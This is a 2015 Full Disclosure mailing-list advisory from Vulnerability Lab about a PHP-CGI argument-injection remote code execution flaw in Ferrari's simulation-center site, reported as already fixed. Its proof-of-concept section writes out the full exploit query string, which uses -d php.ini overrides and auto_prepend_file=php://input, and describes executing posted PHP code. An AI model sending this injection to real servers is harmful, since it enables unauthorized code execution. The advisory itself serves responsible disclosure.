[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] Ferrari - PHP CGI Argument Injection (RCE) Vulnerability
- To: fulldisclosure@xxxxxxxxxxxx
- Subject: [FD] Ferrari - PHP CGI Argument Injection (RCE) Vulnerability
- From: Vulnerability Lab <research@xxxxxxxxxxxxxxxxxxxxx>
- Date: Fri, 7 Aug 2015 19:23:11 +0200
Document Title:
===============
Ferrari - PHP CGI Argument Injection (RCE) Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1562
Video: http://www.vulnerability-lab.com/get_content.php?id=1561
Vulnerability Magazine:
http://magazine.vulnerability-db.com/?q=articles/2015/08/07/ferraricom-simulationcenter-remote-code-execution-php-cgi-argument-injection
Release Date:
=============
2015-08-07
Vulnerability Laboratory ID (VL-ID):
====================================
1562
Common Vulnerability Scoring System:
====================================
9.2
Product & Service Introduction:
===============================
Users can choose from one in five different circuits (Monza, Imola, Mugello,
Silverstone and Nürburgring), while HD screens literally wrap
180 degrees around them, delivering ultra-realistic graphics to boot. The
experience perfectly illustrates the concept of the new Ferrari Store,
which was opened just two months ago and was conceived not merely as a shopping
destination but also as an entertainment venue.
With four F1 simulators, interactive video walls and numerous multisensory
positions, the new 750 square meter space treats visitors to a
completely immersive experience of the Ferrari legend.
(Copy of the Vendor Homepage http://auto.ferrari.com/en_EN/news-events/ )
Abstract Advisory Information:
==============================
An indepndent vulnerability laboratory researcher discovered a remote code
execution vulnerability in the official ferrari online service web-application.
Vulnerability Disclosure Timeline:
==================================
2015-08-07: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Ferrari
Product: Simulator - Online Service (Web-Application) 2015 Q3
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
================================
When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an
argument injection vulnerability. This module takes advantage of
the -d flag to set php.ini directives to achieve code execution. From the
advisory: ``if there is NO unescaped `=` in the query string, the string is
split on `+` (encoded space) characters, urldecoded, passed to a function that
escapes shell metacharacters (the ``encoded in a system-defined
manner`` from the RFC) and then passes them to the CGI binary.`` This module
can also be used to exploit the plesk 0day disclosed by kingcope and
exploited in the wild on June 2013. (Source:
http://www.rapid7.com/db/modules/exploit/multi/http/php_cgi_arg_injection)
Proof of Concept (PoC):
=======================
The remote code execution vulnerability can be exploited by remote attackers
without privilege application user account or user interaction.
For security demonstration or to reproduce follow the provided information and
steps below to continue.
How I found the vulnerability: As part of any penetration test, fingerprinting
is one of the first steps.
After sending a request to their servers, I noticed they used PHP/5.3.12 which
is known to be vulnerable to a Command execution vulnerability.
The Response:
HTTP/1.1 302 Found
Date: Wed, 16 Jun 2015 09:16:13 GMT
Server: Apache
Location: /book/
X-Powered-By: PHP/5.3.12
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html
I started testing for this vulnerability manually and noticed code execution
could be performed. When makeing a POST request to:
http://simulationcenter.ferrari.com/cgi-bin/php?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+
open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n
I noticed an error.
http://i.imgur.com/lFPgpyn.png
When sending some PHP script along with the POST request I noticed the script
was executed. I sent this script: <?php echo(md5(kieran)); ?> and the right
hash was returned.
I then did some automated testing with a metasploit script and this also gave
positive results.
The exploit script can be found here:
http://www.rapid7.com/db/modules/exploit/multi/http/php_cgi_arg_injection
The POC with both manual and automated exploitation can be found here:
hhttps://www.youtube.com/watch?v=vv7SMWC08eI
Solution - Fix & Patch:
=======================
2015-08-05 (fixed by ferrari)
Security Risk:
==============
The security risk of code execution web vulnerability in the ferrari simulator
online service is estimated as critical. (CVSS 9.2)
Credits & Authors:
==================
Kieran Claessens (www.kieranclaessens.be)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any
warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a
particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential
loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen
material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com
- www.evolution-sec.com
Contact: admin@xxxxxxxxxxxxxxxxxxxxx -
research@xxxxxxxxxxxxxxxxxxxxx - admin@xxxxxxxxxxxxxxxxx
Section: magazine.vulnerability-db.com -
vulnerability-lab.com/contact.php -
evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab
- youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php -
vulnerability-lab.com/rss/rss_upcoming.php -
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php -
vulnerability-lab.com/list-of-bug-bounty-programs.php -
vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file
requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All
other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts,
advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To
record, list (feed), modify, use or edit our material contact
(admin@xxxxxxxxxxxxxxxxxxxxx or research@xxxxxxxxxxxxxxxxxxxxx) to get a
permission.
Copyright © 2015 | Vulnerability Laboratory -
[Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@xxxxxxxxxxxxxxxxxxxxx
PGP KEY:
http://www.vulnerability-lab.com/keys/admin@xxxxxxxxxxxxxxxxxxxxx%280x198E9928%29.txt
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/